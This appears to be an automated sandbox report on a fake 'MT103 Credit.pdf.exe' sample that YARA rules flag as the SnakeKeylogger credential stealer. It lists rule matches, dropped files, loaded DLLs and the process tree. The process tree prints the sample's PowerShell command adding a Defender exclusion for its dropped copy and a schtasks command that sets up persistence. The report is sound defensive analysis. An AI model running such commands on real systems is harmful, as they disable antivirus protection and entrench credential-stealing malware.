Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: BEPZA MT103 Credit.pdf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YEGIgzyAhkvT.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, COVIDPickers.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, COVIDPickers.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/11@3/3
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp3E23.tmp
Source: BEPZA MT103 Credit.pdf.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr Binary or memory string: SELECT YEAR(balance_date) AS Year, MONTH(balance_date) AS Month, SUM(profit) AS TotalIncome, SUM(expense) AS TotalExpense FROM Daily_Report GROUP BY YEAR(balance_date), MONTH(balance_date) ORDER BY Year, Month;QA monthly report of profits and expenses%QueryMonthlyReport9SELECT * FROM DATABASE_USERSmINSERT INTO DATABASE_USERS VALUES(@username,@password)[SELECT * FROM DATABASE_USERS WHERE [user_id]=IUPDATE DATABASE_USERS SET password='
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr Binary or memory string: SELECT CONVERT(DATE, V.VISIT_TIME) AS Visit_Date, COUNT(V.CLIENT_VISIT_ID) AS Daily_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY CONVERT(DATE, V.VISIT_TIME) ORDER BY Visit_Date;QA monthly and daily report of gym visits
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3716690730.0000000003D1D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1262992343.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, YEGIgzyAhkvT.exe.0.dr Binary or memory string: SELECT FORMAT(V.VISIT_TIME, 'yyyy-MM') AS Month, COUNT(V.CLIENT_VISIT_ID) AS Total_Visits FROM Client_Visits V JOIN Clients C ON V.CLIENT_ID = C.CLIENT_ID GROUP BY FORMAT(V.VISIT_TIME, 'yyyy-MM') ORDER BY Month;
Source: BEPZA MT103 Credit.pdf.exe Virustotal: Detection: 66%
Source: BEPZA MT103 Credit.pdf.exe ReversingLabs: Detection: 75%
Source: BEPZA MT103 Credit.pdf.exe String found in binary or memory: -Added at (DD-MM-YYYY):
Source: BEPZA MT103 Credit.pdf.exe String found in binary or memory: Log OutIaddUpdateDeleteRowsToolStripMenuItem-Add/Update/Delete rows/clientToolStripMenuItem
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File read: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Process created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Process created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: appresolver.dll
